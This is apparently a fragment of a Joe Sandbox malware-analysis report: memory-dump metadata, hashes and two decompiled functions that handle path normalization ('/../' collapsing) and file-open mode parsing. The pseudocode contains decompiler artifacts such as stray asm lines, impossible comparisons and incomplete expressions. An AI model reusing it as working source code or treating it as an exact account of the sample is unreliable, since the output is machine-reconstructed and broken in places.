                                                                                                                                                              0x7ff6e4c849dd
                                                                                                                                                              0x7ff6e4c849df
                                                                                                                                                              0x7ff6e4c849e4
                                                                                                                                                              0x7ff6e4c849ef
                                                                                                                                                              0x7ff6e4c849f5
                                                                                                                                                              0x7ff6e4c849f9
                                                                                                                                                              0x7ff6e4c849fb
                                                                                                                                                              0x7ff6e4c84a00
                                                                                                                                                              0x7ff6e4c84a02
                                                                                                                                                              0x7ff6e4c84a06
                                                                                                                                                              0x7ff6e4c84a11
                                                                                                                                                              0x7ff6e4c84a17
                                                                                                                                                              0x7ff6e4c84a19
                                                                                                                                                              0x7ff6e4c84a1b
                                                                                                                                                              0x7ff6e4c84a20
                                                                                                                                                              0x7ff6e4c84a2b
                                                                                                                                                              0x7ff6e4c84a31
                                                                                                                                                              0x7ff6e4c84a35
                                                                                                                                                              0x7ff6e4c84a3c
                                                                                                                                                              0x7ff6e4c84a3f
                                                                                                                                                              0x7ff6e4c84a43

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                              • Opcode ID: 0c453a26a65cc264f34480e959e92e92ba93ba76e5a719f7620f73cb9509edd8
                                                                                                                                                              • Instruction ID: ce8d7dc5f829cc7db074c99f8728688ec02186e01196379f92f65f0122923a5f
                                                                                                                                                              • Opcode Fuzzy Hash: 0c453a26a65cc264f34480e959e92e92ba93ba76e5a719f7620f73cb9509edd8
                                                                                                                                                              • Instruction Fuzzy Hash: 6B11C42BE9CA1341F764133AD4C53B910B1AF59B70F050637F56E9B6DAAE1FB840410E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C590F0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 385COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E00007FF67FF6E4C590F0(void* __esi, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
				void* __rsi;
				void* __rbp;
				void* _t82;
				void* _t84;
				void* _t116;
				void* _t123;
				signed long long _t152;
				short* _t168;
				short* _t173;
				void* _t178;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t189;
				void* _t190;
				long long* _t192;
				void* _t194;
				void* _t195;
				char* _t197;
				char* _t198;
				void* _t199;
				intOrPtr _t223;
				intOrPtr _t225;
				intOrPtr _t233;
				intOrPtr _t238;
				void* _t246;
				void* _t250;
				void* _t253;
				intOrPtr* _t254;
				void* _t256;
				intOrPtr _t257;
				intOrPtr _t258;
				intOrPtr _t263;
				intOrPtr _t268;
				long long _t269;
				void* _t270;
				void* _t275;
				intOrPtr _t278;
				void* _t283;
				void* _t285;
				signed long long _t286;
				void* _t308;
				intOrPtr _t309;
				void* _t311;
				void* _t314;
				intOrPtr _t315;
				void* _t328;
				intOrPtr _t331;

				 *((long long*)(_t285 + 0x18)) = __rbx;
				_t286 = _t285 - 0x60;
				_t152 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t286 + 0x50) = _t152 ^ _t286;
				_t254 = __rcx;
				 *((long long*)(_t286 + 0x28)) = __rcx;
				 *(_t286 + 0x20) = 0;
				E00007FF67FF6E4C49E00(_t152 ^ _t286, 0, __rcx, __rdx, _t256);
				r12d = 1;
				 *(_t286 + 0x20) = r12d;
				_t6 = _t254 + 0x10; // 0x158e82024548d
				_t257 =  *_t6;
				if (_t257 == 0) goto 0xe4c59172;
				_t7 = _t254 + 0x18; // 0x24548b48d8b60f00
				_t233 =  *_t7;
				if (_t233 - 0x10 < 0) goto 0xe4c59150;
				if ( *((char*)( *_t254)) != 0x5c) goto 0xe4c59166;
				if (_t233 - 0x10 < 0) goto 0xe4c59162;
				 *((char*)( *_t254)) = 0x2f;
				if (1 - _t257 < 0) goto 0xe4c59140;
				_t10 = _t254 + 0x10; // 0x158e82024548d
				_t258 =  *_t10;
				asm("repne dec eax");
				_t11 = _t254 + 0x18; // 0x24548b48d8b60f00
				_t315 =  *_t11;
				if (_t315 - 0x10 < 0) goto 0xe4c5919a;
				_t291 =  >  ? 0x2 : _t275;
				E00007FF67FF6E4C64280(_t84,  *_t254, 0xe4c89bc8,  >  ? 0x2 : _t275);
				if (1 != 0) goto 0xe4c5938c;
				if (_t275 - 2 >= 0) goto 0xe4c591c6;
				if (0xffffffff != 0) goto 0xe4c5938c;
				 *((long long*)(_t286 + 0x30)) = 0;
				 *((long long*)(_t286 + 0x48)) = 0xf;
				if (_t258 - 2 < 0) goto 0xe4c59655;
				_t16 = _t258 - 2; // 0x158e82024548b
				_t277 =  <  ? _t16 : 0xffffffff;
				if (_t315 - 0x10 < 0) goto 0xe4c59209;
				if (0xffffffff - 0xf > 0) goto 0xe4c5923c;
				 *((long long*)(_t286 + 0x40)) = 0xffffffff;
				E00007FF67FF6E4C64380();
				 *((char*)(_t286 + 0x2f)) = 0;
				goto 0xe4c592da;
				if (0xffffffff - 0xffffffff > 0) goto 0xe4c59667;
				if (0xffffffffffffffff - 0xffffffff <= 0) goto 0xe4c59260;
				goto 0xe4c59287;
				if (0x8000000000000000 - 0x1000 < 0) goto 0xe4c592a6;
				if (0x8000000000000027 - 0x8000000000000000 <= 0) goto 0xe4c5965b;
				E00007FF67FF6E4C623D8(0x8000000000000027, 0x8000000000000027);
				if (0x8000000000000027 == 0) goto 0xe4c59661;
				 *0x8000000000000038 = 0x8000000000000027;
				goto 0xe4c592b8;
				if (0x8000000000000027 == 0) goto 0xe4c592b5;
				E00007FF67FF6E4C623D8(0x8000000000000027, 0x8000000000000027);
				goto 0xe4c592b8;
				 *((long long*)(_t286 + 0x40)) = 0xffffffff;
				 *((long long*)(_t286 + 0x48)) = 0xffffffff;
				E00007FF67FF6E4C64380();
				 *((char*)(0 + ( <  ? _t16 : 0xffffffff))) = 0;
				 *((long long*)(_t286 + 0x30)) = 0;
				r12d = r12d | 0x00000002;
				 *(_t286 + 0x20) = r12d;
				if (_t254 == _t286 + 0x30) goto 0xe4c5934c;
				_t34 = _t254 + 0x18; // 0x24548b48d8b60f00
				_t238 =  *_t34;
				if (_t238 - 0x10 < 0) goto 0xe4c59327;
				if (_t238 + 1 - 0x1000 < 0) goto 0xe4c59322;
				if ( *_t254 -  *((intOrPtr*)( *_t254 - 8)) - 8 - 0x1f > 0) goto 0xe4c59661;
				0xe4c623d0(_t328, _t314, _t311, _t308, _t253, _t256, _t275);
				 *(_t254 + 0x18) = 0xf;
				 *_t254 = 0;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [edi], xmm0");
				asm("movups xmm1, [esp+0x40]");
				asm("movups [edi+0x10], xmm1");
				_t38 = _t254 + 0x10; // 0x158e82024548d
				_t263 =  *_t38;
				goto 0xe4c5917c;
				if (_t263 - 0x10 < 0) goto 0xe4c59383;
				_t39 = _t263 + 1; // 0x100000000
				if (_t39 - 0x1000 < 0) goto 0xe4c5937b;
				if (0 -  *0xFFFFFFFFFFFFFFF8 + 0xfffffff8 - 0x1f > 0) goto 0xe4c59661;
				0xe4c623d0();
				goto 0xe4c5917c;
				if (_t308 - 0x10 < 0) goto 0xe4c593a1;
				_t43 = _t254 + 0x10; // 0x158e82024548d
				_t278 =  *_t43;
				if (_t278 - 2 < 0) goto 0xe4c59442;
				_t44 = _t278 - 2; // 0x158e82024548b
				_t168 = _t44;
				_t116 = 0x1 - _t168;
				if (_t116 > 0) goto 0xe4c59442;
				 *((intOrPtr*)(_t168 - 0x7b)) =  *((intOrPtr*)(_t168 - 0x7b)) + _t84;
				asm("ror byte [eax-0x75], 0xf0");
				if (_t116 == 0) goto 0xe4c59442;
				if ( *_t168 == 0x2f2f) goto 0xe4c593f3;
				goto 0xe4c593cb;
				if (0x1 == 0xffffffff) goto 0xe4c59442;
				if (_t278 - 0x1 < 0) goto 0xe4c59655;
				_t245 =  <  ? _t278 - 0x1 : 0x1;
				if (_t308 - 0x10 < 0) goto 0xe4c59423;
				 *((long long*)(_t254 + 0x10)) = _t278 - 0x1;
				_t246 = ( <  ? _t278 - 0x1 : 0x1) +  *_t254 + 0x1;
				E00007FF67FF6E4C64380();
				goto 0xe4c59391;
				_t54 = _t254 + 0x18; // 0x24548b48d8b60f00
				_t331 =  *_t54;
				if (_t331 - 0x10 < 0) goto 0xe4c59452;
				_t55 = _t254 + 0x10; // 0x158e82024548d
				_t268 =  *_t55;
				if (_t268 - 3 < 0) goto 0xe4c594f9;
				_t56 = _t268 - 3; // 0x158e82024548a
				_t173 = _t56;
				_t123 = 0 - _t173;
				if (_t123 > 0) goto 0xe4c594f9;
				 *((intOrPtr*)(_t173 - 0x7b)) =  *((intOrPtr*)(_t173 - 0x7b)) + _t84;
				asm("ror byte [eax-0x75], 0xd8");
				if (_t123 == 0) goto 0xe4c594f9;
				if ( *_t173 != 0x2e2f) goto 0xe4c5949b;
				if ( *((char*)(_t173 + 2)) == 0x2f) goto 0xe4c594aa;
				goto 0xe4c5947c;
				_t189 = 1 -  *_t254;
				if (_t189 == 0xffffffff) goto 0xe4c594f9;
				if (_t268 - _t189 < 0) goto 0xe4c59655;
				_t249 =  <  ? _t268 - _t189 : 0x2;
				if (_t331 - 0x10 < 0) goto 0xe4c594da;
				_t269 = _t268 - 0x2;
				 *((long long*)(_t254 + 0x10)) = _t269;
				_t270 = _t269 - _t189;
				_t250 = ( <  ? _t268 - _t189 : 0x2) +  *_t254 + _t189;
				E00007FF67FF6E4C64380();
				goto 0xe4c59442;
				r13d = 4;
				_t190 = _t270;
				_t178 = _t270;
				_t67 = _t254 + 0x18; // 0x24548b48d8b60f00
				_t309 =  *_t67;
				if (_t309 - 0x10 < 0) goto 0xe4c59515;
				_t223 =  *_t254;
				if (_t178 - 0xffffffff < 0) goto 0xe4c5962d;
				_t179 = _t178 + 0xfffffffc;
				_t191 =  <  ? _t179 : _t190;
				_t192 = ( <  ? _t179 : _t190) + _t223;
				if ( *_t192 != 0x2f) goto 0xe4c5953d;
				if ( *_t192 == 0x2f2e2e2f) goto 0xe4c5954b;
				if (_t192 == _t223) goto 0xe4c5962d;
				goto 0xe4c59530;
				_t194 = _t192 - 1 - _t223;
				if (_t194 == 0xffffffff) goto 0xe4c5962d;
				if (_t309 - 0x10 < 0) goto 0xe4c59567;
				_t225 =  *_t254;
				_t195 = _t194 - 1;
				if (_t270 == 0) goto 0xe4c5962d;
				_t68 = _t270 - 1; // 0x158e82024548c
				_t180 = _t68;
				_t196 =  <  ? _t180 : _t195;
				_t197 = ( <  ? _t180 : _t195) + _t225;
				if ( *_t197 == 0x2f) goto 0xe4c59597;
				if (_t197 == _t225) goto 0xe4c5962d;
				_t198 = _t197 - 1;
				if ( *_t198 != 0x2f) goto 0xe4c59586;
				_t199 = _t198 - _t225;
				if (_t199 == 0xffffffff) goto 0xe4c5962d;
				if (_t270 - _t199 < 0) goto 0xe4c59655;
				_t283 = _t270 - _t199;
				_t326 =  <  ? _t283 : 0xffffffff;
				if (_t309 - 0x10 < 0) goto 0xe4c595c9;
				_t182 =  *_t254;
				_t306 =  >  ? 0xffffffff : 0xffffffff;
				_t82 = E00007FF67FF6E4C64280(_t84, _t199 + _t182, 0xe4c89bcc,  >  ? 0xffffffff : 0xffffffff);
				if (_t182 != 0) goto 0xe4c595f0;
				_t148 = ( <  ? _t283 : 0xffffffff) - 0xffffffff;
				if (( <  ? _t283 : 0xffffffff) == 0xffffffff) goto 0xe4c59502;
				_t70 = _t194 - _t199 + 3; // 0x158e82024548f
				_t184 =  <  ? _t283 : _t70;
				if (_t309 - 0x10 < 0) goto 0xe4c5960a;
				_t271 = _t270 - ( <  ? _t283 : _t70);
				 *((long long*)(_t254 + 0x10)) = _t270 - ( <  ? _t283 : _t70);
				E00007FF67FF6E4C64380();
				goto 0xe4c594ff;
				return E00007FF67FF6E4C623B0(_t82, _t84,  *( *(_t254 + 0x18) + 0x50) ^  *(_t254 + 0x18));
			}



















































                                                                                                                                                              0x7ff6e4c590f0
                                                                                                                                                              0x7ff6e4c59100
                                                                                                                                                              0x7ff6e4c59104
                                                                                                                                                              0x7ff6e4c5910e
                                                                                                                                                              0x7ff6e4c59113
                                                                                                                                                              0x7ff6e4c59116
                                                                                                                                                              0x7ff6e4c5911d
                                                                                                                                                              0x7ff6e4c59121
                                                                                                                                                              0x7ff6e4c59126
                                                                                                                                                              0x7ff6e4c5912c
                                                                                                                                                              0x7ff6e4c59131
                                                                                                                                                              0x7ff6e4c59131
                                                                                                                                                              0x7ff6e4c5913a
                                                                                                                                                              0x7ff6e4c59143
                                                                                                                                                              0x7ff6e4c59143
                                                                                                                                                              0x7ff6e4c5914b
                                                                                                                                                              0x7ff6e4c59154
                                                                                                                                                              0x7ff6e4c5915d
                                                                                                                                                              0x7ff6e4c59162
                                                                                                                                                              0x7ff6e4c5916c
                                                                                                                                                              0x7ff6e4c5916e
                                                                                                                                                              0x7ff6e4c5916e
                                                                                                                                                              0x7ff6e4c59185
                                                                                                                                                              0x7ff6e4c5918d
                                                                                                                                                              0x7ff6e4c5918d
                                                                                                                                                              0x7ff6e4c59195
                                                                                                                                                              0x7ff6e4c591a1
                                                                                                                                                              0x7ff6e4c591ac
                                                                                                                                                              0x7ff6e4c591b3
                                                                                                                                                              0x7ff6e4c591bd
                                                                                                                                                              0x7ff6e4c591cd
                                                                                                                                                              0x7ff6e4c591d3
                                                                                                                                                              0x7ff6e4c591d8
                                                                                                                                                              0x7ff6e4c591e5
                                                                                                                                                              0x7ff6e4c591eb
                                                                                                                                                              0x7ff6e4c591f9
                                                                                                                                                              0x7ff6e4c59204
                                                                                                                                                              0x7ff6e4c59211
                                                                                                                                                              0x7ff6e4c59213
                                                                                                                                                              0x7ff6e4c59223
                                                                                                                                                              0x7ff6e4c59228
                                                                                                                                                              0x7ff6e4c59237
                                                                                                                                                              0x7ff6e4c5923f
                                                                                                                                                              0x7ff6e4c5924f
                                                                                                                                                              0x7ff6e4c5925e
                                                                                                                                                              0x7ff6e4c59278
                                                                                                                                                              0x7ff6e4c59281
                                                                                                                                                              0x7ff6e4c5928a
                                                                                                                                                              0x7ff6e4c59292
                                                                                                                                                              0x7ff6e4c592a0
                                                                                                                                                              0x7ff6e4c592a4
                                                                                                                                                              0x7ff6e4c592a9
                                                                                                                                                              0x7ff6e4c592ab
                                                                                                                                                              0x7ff6e4c592b3
                                                                                                                                                              0x7ff6e4c592b8
                                                                                                                                                              0x7ff6e4c592bd
                                                                                                                                                              0x7ff6e4c592cb
                                                                                                                                                              0x7ff6e4c592d0
                                                                                                                                                              0x7ff6e4c592d5
                                                                                                                                                              0x7ff6e4c592da
                                                                                                                                                              0x7ff6e4c592de
                                                                                                                                                              0x7ff6e4c592eb
                                                                                                                                                              0x7ff6e4c592ed
                                                                                                                                                              0x7ff6e4c592ed
                                                                                                                                                              0x7ff6e4c592f5
                                                                                                                                                              0x7ff6e4c59304
                                                                                                                                                              0x7ff6e4c59319
                                                                                                                                                              0x7ff6e4c59322
                                                                                                                                                              0x7ff6e4c59327
                                                                                                                                                              0x7ff6e4c5932f
                                                                                                                                                              0x7ff6e4c59332
                                                                                                                                                              0x7ff6e4c59337
                                                                                                                                                              0x7ff6e4c5933a
                                                                                                                                                              0x7ff6e4c5933f
                                                                                                                                                              0x7ff6e4c59343
                                                                                                                                                              0x7ff6e4c59343
                                                                                                                                                              0x7ff6e4c59347
                                                                                                                                                              0x7ff6e4c59350
                                                                                                                                                              0x7ff6e4c59352
                                                                                                                                                              0x7ff6e4c59360
                                                                                                                                                              0x7ff6e4c59375
                                                                                                                                                              0x7ff6e4c5937e
                                                                                                                                                              0x7ff6e4c59387
                                                                                                                                                              0x7ff6e4c5939c
                                                                                                                                                              0x7ff6e4c593a1
                                                                                                                                                              0x7ff6e4c593a1
                                                                                                                                                              0x7ff6e4c593a9
                                                                                                                                                              0x7ff6e4c593af
                                                                                                                                                              0x7ff6e4c593af
                                                                                                                                                              0x7ff6e4c593b3
                                                                                                                                                              0x7ff6e4c593b6
                                                                                                                                                              0x7ff6e4c593d4
                                                                                                                                                              0x7ff6e4c593d7
                                                                                                                                                              0x7ff6e4c593db
                                                                                                                                                              0x7ff6e4c593e2
                                                                                                                                                              0x7ff6e4c593f1
                                                                                                                                                              0x7ff6e4c593fa
                                                                                                                                                              0x7ff6e4c593ff
                                                                                                                                                              0x7ff6e4c59414
                                                                                                                                                              0x7ff6e4c5941e
                                                                                                                                                              0x7ff6e4c5942a
                                                                                                                                                              0x7ff6e4c59435
                                                                                                                                                              0x7ff6e4c59438
                                                                                                                                                              0x7ff6e4c5943d
                                                                                                                                                              0x7ff6e4c59445
                                                                                                                                                              0x7ff6e4c59445
                                                                                                                                                              0x7ff6e4c5944d
                                                                                                                                                              0x7ff6e4c59452
                                                                                                                                                              0x7ff6e4c59452
                                                                                                                                                              0x7ff6e4c5945a
                                                                                                                                                              0x7ff6e4c59460
                                                                                                                                                              0x7ff6e4c59460
                                                                                                                                                              0x7ff6e4c59464
                                                                                                                                                              0x7ff6e4c59467
                                                                                                                                                              0x7ff6e4c59485
                                                                                                                                                              0x7ff6e4c59488
                                                                                                                                                              0x7ff6e4c5948c
                                                                                                                                                              0x7ff6e4c59493
                                                                                                                                                              0x7ff6e4c59499
                                                                                                                                                              0x7ff6e4c594a8
                                                                                                                                                              0x7ff6e4c594aa
                                                                                                                                                              0x7ff6e4c594b1
                                                                                                                                                              0x7ff6e4c594b6
                                                                                                                                                              0x7ff6e4c594cb
                                                                                                                                                              0x7ff6e4c594d5
                                                                                                                                                              0x7ff6e4c594de
                                                                                                                                                              0x7ff6e4c594e1
                                                                                                                                                              0x7ff6e4c594e5
                                                                                                                                                              0x7ff6e4c594ec
                                                                                                                                                              0x7ff6e4c594ef
                                                                                                                                                              0x7ff6e4c594f4
                                                                                                                                                              0x7ff6e4c594f9
                                                                                                                                                              0x7ff6e4c594ff
                                                                                                                                                              0x7ff6e4c59502
                                                                                                                                                              0x7ff6e4c59508
                                                                                                                                                              0x7ff6e4c59508
                                                                                                                                                              0x7ff6e4c59510
                                                                                                                                                              0x7ff6e4c59512
                                                                                                                                                              0x7ff6e4c59518
                                                                                                                                                              0x7ff6e4c5951e
                                                                                                                                                              0x7ff6e4c59525
                                                                                                                                                              0x7ff6e4c59529
                                                                                                                                                              0x7ff6e4c59533
                                                                                                                                                              0x7ff6e4c5953b
                                                                                                                                                              0x7ff6e4c59540
                                                                                                                                                              0x7ff6e4c59549
                                                                                                                                                              0x7ff6e4c5954b
                                                                                                                                                              0x7ff6e4c59555
                                                                                                                                                              0x7ff6e4c59562
                                                                                                                                                              0x7ff6e4c59564
                                                                                                                                                              0x7ff6e4c59567
                                                                                                                                                              0x7ff6e4c5956d
                                                                                                                                                              0x7ff6e4c59573
                                                                                                                                                              0x7ff6e4c59573
                                                                                                                                                              0x7ff6e4c5957a
                                                                                                                                                              0x7ff6e4c5957e
                                                                                                                                                              0x7ff6e4c59584
                                                                                                                                                              0x7ff6e4c59589
                                                                                                                                                              0x7ff6e4c5958f
                                                                                                                                                              0x7ff6e4c59595
                                                                                                                                                              0x7ff6e4c59597
                                                                                                                                                              0x7ff6e4c5959e
                                                                                                                                                              0x7ff6e4c595a7
                                                                                                                                                              0x7ff6e4c595b0
                                                                                                                                                              0x7ff6e4c595b9
                                                                                                                                                              0x7ff6e4c595c4
                                                                                                                                                              0x7ff6e4c595c6
                                                                                                                                                              0x7ff6e4c595cf
                                                                                                                                                              0x7ff6e4c595de
                                                                                                                                                              0x7ff6e4c595e5
                                                                                                                                                              0x7ff6e4c595e7
                                                                                                                                                              0x7ff6e4c595ea
                                                                                                                                                              0x7ff6e4c595f3
                                                                                                                                                              0x7ff6e4c595fa
                                                                                                                                                              0x7ff6e4c59605
                                                                                                                                                              0x7ff6e4c5960d
                                                                                                                                                              0x7ff6e4c59610
                                                                                                                                                              0x7ff6e4c5961f
                                                                                                                                                              0x7ff6e4c59628
                                                                                                                                                              0x7ff6e4c59654

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: /../$/../
                                                                                                                                                              • API String ID: 73155330-1624290729
                                                                                                                                                              • Opcode ID: 197f9f369e68944a8684af41371c70330e5d9e23c9a10c4d3fdbba5d1436fc02
                                                                                                                                                              • Instruction ID: 114613dcf47b26fe40fadd61d1935f08e04b5e79be71eb1c4f91ada131fe7ccd
                                                                                                                                                              • Opcode Fuzzy Hash: 197f9f369e68944a8684af41371c70330e5d9e23c9a10c4d3fdbba5d1436fc02
                                                                                                                                                              • Instruction Fuzzy Hash: 71E1222BB4864385EA149B35D5883BD6271AB00FA0F448673DA2D87BD1DF7EE491C30B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7B2AC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E00007FF67FF6E4C7B2AC(void* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed char _t37;
				intOrPtr _t40;
				void* _t41;
				void* _t53;
				void* _t58;
				signed int _t64;
				void* _t65;
				signed int _t69;
				signed int _t87;
				void* _t110;
				signed long long _t116;
				signed long long _t117;
				signed long long _t126;
				intOrPtr* _t128;
				signed long long _t129;
				intOrPtr* _t140;
				char* _t141;
				char* _t142;

				_a8 = __rbx;
				_a16 = __rsi;
				 *__rcx = 0;
				__rcx[2] = 0;
				_t87 =  *0xe4cab6f0; // 0x0
				__rcx[1] = _t87;
				goto 0xe4c7b2dc;
				_t140 = __rdx + 1;
				_t37 =  *_t140;
				if (_t37 == 0x20) goto 0xe4c7b2d6;
				if (_t37 == 0x72) goto 0xe4c7b2fd;
				if (_t37 != 0x77) goto 0xe4c7b54a;
				 *__rcx = 0x301;
				goto 0xe4c7b30f;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] = 1;
				goto 0xe4c7b312;
				 *__rcx = 0x109;
				__rcx[1] = 0x2;
				_t141 = _t140 + 1;
				r9b = 0;
				dil = 0;
				r10b = 0;
				r11b = 0;
				if ( *_t141 == 0) goto 0xe4c7b46f;
				_t58 = __rcx - 0x53;
				if (_t58 > 0) goto 0xe4c7b3dd;
				if (_t58 == 0) goto 0xe4c7b3c6;
				if (_t58 == 0) goto 0xe4c7b45d;
				if (_t58 == 0) goto 0xe4c7b397;
				if (_t58 == 0) goto 0xe4c7b38f;
				if (_t58 == 0) goto 0xe4c7b37d;
				_t110 = __rcx - 0xfffffffffffffff2;
				if (_t58 == 0) goto 0xe4c7b374;
				if (_t110 != 4) goto 0xe4c7b54a;
				if (r10b != 0) goto 0xe4c7b451;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0xe4c7b3d2;
				asm("bts dword [ebx], 0x7");
				goto 0xe4c7b45b;
				if ((_t37 & 0x00000040) != 0) goto 0xe4c7b451;
				goto 0xe4c7b459;
				r11b = 1;
				goto 0xe4c7b451;
				if (dil != 0) goto 0xe4c7b451;
				dil = 1;
				if ((sil & _t37) != 0) goto 0xe4c7b451;
				 *__rcx =  *__rcx & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0xe4c7b45b;
				_t64 = r10b;
				if (_t64 != 0) goto 0xe4c7b451;
				 *__rcx =  *__rcx | 0x00000020;
				r10b = 1;
				goto 0xe4c7b45d;
				if (_t64 == 0) goto 0xe4c7b449;
				if (_t64 == 0) goto 0xe4c7b43a;
				if (_t64 == 0) goto 0xe4c7b428;
				if (_t64 == 0) goto 0xe4c7b41c;
				if (_t64 == 0) goto 0xe4c7b40d;
				_t65 = _t110 - 0x34 - 4;
				if (_t65 != 0) goto 0xe4c7b54a;
				asm("bt eax, 0x9");
				if (_t65 >= 0) goto 0xe4c7b451;
				asm("bts eax, 0xa");
				goto 0xe4c7b459;
				if (( *__rcx & 0x0000c000) != 0) goto 0xe4c7b451;
				asm("bts eax, 0xe");
				goto 0xe4c7b459;
				if (r9b != 0) goto 0xe4c7b451;
				asm("btr dword [ebx+0x4], 0xb");
				goto 0xe4c7b432;
				if (r9b != 0) goto 0xe4c7b451;
				asm("bts dword [ebx+0x4], 0xb");
				r9b = 1;
				goto 0xe4c7b45d;
				_t69 =  *__rcx & 0x0000c000;
				if (_t69 != 0) goto 0xe4c7b451;
				asm("bts eax, 0xf");
				goto 0xe4c7b459;
				asm("bt eax, 0xc");
				if (_t69 >= 0) goto 0xe4c7b455;
				goto 0xe4c7b45d;
				asm("bts eax, 0xc");
				_t142 = _t141;
				if (1 != 0) goto 0xe4c7b323;
				_t125 =  ==  ? _t142 : _t142 + 1;
				goto 0xe4c7b47f;
				_t126 = ( ==  ? _t142 : _t142 + 1) + 1;
				if ( *_t126 == 0x20) goto 0xe4c7b47c;
				if (r11b != 0) goto 0xe4c7b49b;
				if ( *_t126 != r11b) goto 0xe4c7b54a;
				__rcx[2] = 1;
				goto 0xe4c7b55a;
				r8d = 3;
				_t116 = _t126;
				E00007FF67FF6E4C74F20( *_t141, _t116, 0xe4c981f0, _t142);
				if (0 != 0) goto 0xe4c7b54a;
				goto 0xe4c7b4c1;
				_t128 = _t126 + 4;
				_t40 =  *_t128;
				if (_t40 == 0x20) goto 0xe4c7b4be;
				if (_t40 != 0x3d) goto 0xe4c7b54a;
				_t129 = _t128 + 1;
				if ( *_t129 == 0x20) goto 0xe4c7b4cb;
				asm("int 0x1");
				 *((intOrPtr*)(__rcx + _t116 * 4 - 0x3a)) =  *((intOrPtr*)(__rcx + _t116 * 4 - 0x3a)) + _t40;
				_t117 = _t129;
				_t41 = E00007FF67FF6E4C83790(0, _t117);
				if (0 != 0) goto 0xe4c7b4f4;
				asm("bts dword [ebx], 0x12");
				goto 0xe4c7b534;
				asm("int 0x1");
				 *((intOrPtr*)(__rcx + _t117 * 4 - 0x3a)) =  *((intOrPtr*)(__rcx + _t117 * 4 - 0x3a)) + _t41;
				E00007FF67FF6E4C83790(0, _t129);
				if (0 != 0) goto 0xe4c7b515;
				asm("bts dword [ebx], 0x11");
				goto 0xe4c7b534;
				asm("int3");
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
				r8d = _t53;
				E00007FF67FF6E4C83790(0, _t129);
				if (0 != 0) goto 0xe4c7b54a;
				asm("bts dword [ebx], 0x10");
				goto 0xe4c7b53d;
				if ( *((intOrPtr*)(_t129 + 0xe7158d4800000008)) == 0x20) goto 0xe4c7b53a;
				goto 0xe4c7b48c;
				E00007FF67FF6E4C6C854(0);
				 *((long long*)(0)) = 0x16;
				return E00007FF67FF6E4C6A5D8();
			}





















                                                                                                                                                              0x7ff6e4c7b2ac
                                                                                                                                                              0x7ff6e4c7b2b1
                                                                                                                                                              0x7ff6e4c7b2c0
                                                                                                                                                              0x7ff6e4c7b2c6
                                                                                                                                                              0x7ff6e4c7b2c9
                                                                                                                                                              0x7ff6e4c7b2cf
                                                                                                                                                              0x7ff6e4c7b2d4
                                                                                                                                                              0x7ff6e4c7b2d6
                                                                                                                                                              0x7ff6e4c7b2d9
                                                                                                                                                              0x7ff6e4c7b2de
                                                                                                                                                              0x7ff6e4c7b2eb
                                                                                                                                                              0x7ff6e4c7b2ef
                                                                                                                                                              0x7ff6e4c7b2f5
                                                                                                                                                              0x7ff6e4c7b2fb
                                                                                                                                                              0x7ff6e4c7b2fd
                                                                                                                                                              0x7ff6e4c7b300
                                                                                                                                                              0x7ff6e4c7b307
                                                                                                                                                              0x7ff6e4c7b309
                                                                                                                                                              0x7ff6e4c7b30f
                                                                                                                                                              0x7ff6e4c7b312
                                                                                                                                                              0x7ff6e4c7b315
                                                                                                                                                              0x7ff6e4c7b318
                                                                                                                                                              0x7ff6e4c7b31b
